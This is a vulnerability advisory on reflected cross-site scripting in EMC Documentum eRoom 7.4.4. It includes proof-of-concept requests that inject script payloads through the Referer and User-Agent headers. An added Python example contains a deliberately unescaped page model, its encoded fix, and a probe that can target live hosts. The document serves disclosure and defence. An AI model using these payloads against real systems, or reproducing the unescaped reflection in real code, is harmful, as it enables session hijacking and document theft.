SEC Consult Vulnerability Lab Security Advisory < 20131107-0 >
=======================================================================
title: Multiple reflected cross-site scripting vulnerabilities
product: EMC Documentum eRoom
vulnerable version: 7.4.4
fixed version: 7.4.4 P11
CVE: CVE-2013-3286
impact: medium
homepage: www.emc.com/products/detail/software2/eroom.htm
found: 2012-08-20
by: V. Paulikas
SEC Consult Vulnerability Lab
=======================================================================
Vendor description:
-------------------
"EMC Documentum eRoom is easy-to-use online team collaboration software that
enables distributed teams to work together more efficiently. With Documentum
eRoom, teams around the world can accelerate document collaboration and group
activities, improve the development and delivery of products and services,
optimize collaborative business processes, improve innovation, and streamline
decision-making."
www.emc.com/products/detail/software2/eroom.htm
Vulnerability overview/description:
-----------------------------------
Documentum eRoom suffers from multiple reflected cross-site scripting
vulnerabilities, which allow an attacker to steal other users' sessions,
to impersonate those users and to gain unauthorized access to documents
hosted in eRooms. A JavaScript worm could be used to crawl an eRoom and
gather all available documents.
Many request parameters and headers are reflected into the response without
output encoding and are thus vulnerable to XSS.
Proof of concept:
-----------------
1) The "Referer" header is reflected into the response without output
encoding and is thus prone to reflected cross-site scripting.
Request:
POST /eRoomASP/Connect.asp?Ctxt=&ERClickInMap=FALSE&command=btnDefault&SessionKey= HTTP/1.1
Host: localhost
Referer: localhost/eRoomxss"><script>alert(document.cookie)</script>

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=&ERWindowName=eRw1343558275&LoginName=asd&Password=asd
2) The "User-Agent" header is reflected into the response without output
encoding and is thus prone to reflected cross-site scripting.
Request:
GET /eRoomtest/diagVariables.asp HTTP/1.1
User-Agent: <script>alert(document.cookie)</script>
Host: localhost
Other vulnerable header fields include "Connection" and "Accept-Language".
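Added example (not part of the SEC Consult advisory and not EMC code): the
Python script below models the unsafe header reflection that the
diagVariables.asp proof of concept demonstrates, places the standard fix next
to it (HTML-entity encoding of every reflected header value before it is put
into the page), and gives a probe that injects a unique canary into each of the
four headers the advisory names and reports which ones come back unencoded.
The page model is an assumption, since the ASP source is not published; the
probe takes any callable that maps request headers to a response body, so the
same check runs against a live host by swapping in fetch_over_http() (host,
port and path are placeholders taken from the PoC). Two practical notes: a
random canary is used instead of the literal <script>alert(...)</script> so the
check is not fooled by a page that already contains that string, and
User-Agent, Connection and Accept-Language are only attacker-controllable when
the attacker can shape the victim's request, whereas a Referer payload can be
delivered by a link from an attacker-controlled page whose URL carries the
payload (subject to the browser's referrer policy).

```python
"""Reflected-header XSS: vulnerable page model, hardened page, and a probe.

Added example, not code from SEC Consult or EMC. render_diag_vulnerable()
is an assumed model of a diagnostics page that echoes request headers into
HTML verbatim; render_diag_fixed() is the same page with output encoding.
"""
import html
import http.client
import secrets

# Headers the advisory names as reflected into the response.
REFLECTED_HEADERS = ("Referer", "User-Agent", "Connection", "Accept-Language")


def _table(rows):
    return f"<html><body><table>{''.join(rows)}</table></body></html>"


def render_diag_vulnerable(headers):
    """Assumed unsafe page: header values are concatenated into HTML as-is."""
    return _table(
        f"<tr><td>{name}</td><td>{headers.get(name, '')}</td></tr>"
        for name in REFLECTED_HEADERS
    )


def render_diag_fixed(headers):
    """Same page with every reflected value HTML-entity-encoded (quote=True
    also encodes double quotes, so breaking out of attributes is blocked)."""
    return _table(
        f"<tr><td>{name}</td><td>{html.escape(headers.get(name, ''), quote=True)}</td></tr>"
        for name in REFLECTED_HEADERS
    )


def make_canary(nbytes=4):
    """Random token wrapped in the characters a safe page must encode:
    a double quote, '>' and '<'. Random so it never collides with page text."""
    token = secrets.token_hex(nbytes)
    return f'c{token}"><{token}>'


def reflected_unencoded(body, canary):
    """True if the canary appears in the body with its " > < intact."""
    return canary in body


def probe(render, base_headers=None):
    """Inject a fresh canary into each header in turn, obtain the page via
    `render` (a callable headers -> body), and return the names of headers
    whose canary came back unencoded."""
    base = dict(base_headers or {})
    hits = []
    for name in REFLECTED_HEADERS:
        canary = make_canary()
        hdrs = dict(base)
        # Same shape as the advisory's Referer PoC: a URL-like prefix, then payload.
        hdrs[name] = f"localhost/eRoom{canary}"
        if reflected_unencoded(render(hdrs), canary):
            hits.append(name)
    return hits


def fetch_over_http(host="localhost", port=80, path="/eRoomtest/diagVariables.asp"):
    """Build a render callable that sends the probe headers to a real server.
    Host, port and path are placeholders from the PoC; this is only used when
    testing against a live target, never in the offline run below."""
    def render(headers):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        try:
            conn.request("GET", path, headers=headers)
            return conn.getresponse().read().decode("utf-8", "replace")
        finally:
            conn.close()
    return render


if __name__ == "__main__":
    poc = {"User-Agent": "<script>alert(document.cookie)</script>"}
    print("vulnerable model reflects raw :", probe(render_diag_vulnerable))
    print("fixed model reflects raw      :", probe(render_diag_fixed))
    print("fixed model output for PoC UA :", render_diag_fixed(poc))
```

Running the script offline shows all four headers reported for the vulnerable
model and none for the fixed one; the fixed page renders the PoC User-Agent as
&lt;script&gt;..., which the browser displays as text rather than executing.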
Vendor contact timeline:
------------------------
2012-10-09: Contacting vendor through security_alert@emc.com
2012-10-09: Vendor forwarded information to product team
2012-10-31: Vendor investigates reported issues
2013-07-16: Vendor will release fixes for the issues with 7.4.4 SP1 in early Q2 2014
2013-11-13: Coordinated release of advisory
Solution:
---------
Upgrade to EMC Documentum eRoom version 7.4.4 P11.
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
EOF V. Paulikas / @2013